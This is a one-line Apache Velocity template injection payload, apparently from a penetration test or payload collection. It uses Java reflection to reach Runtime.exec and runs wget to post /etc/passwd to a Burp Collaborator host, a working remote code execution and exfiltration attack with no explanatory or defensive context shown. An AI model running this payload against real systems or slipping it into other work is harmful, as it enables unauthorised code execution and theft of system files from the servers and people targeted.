#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec('wget --post-file /etc/passwd http://vwvgbgsg0k309gemkm1m3rrj7ad11q.burpcollaborator.net/rcetest?a=a')
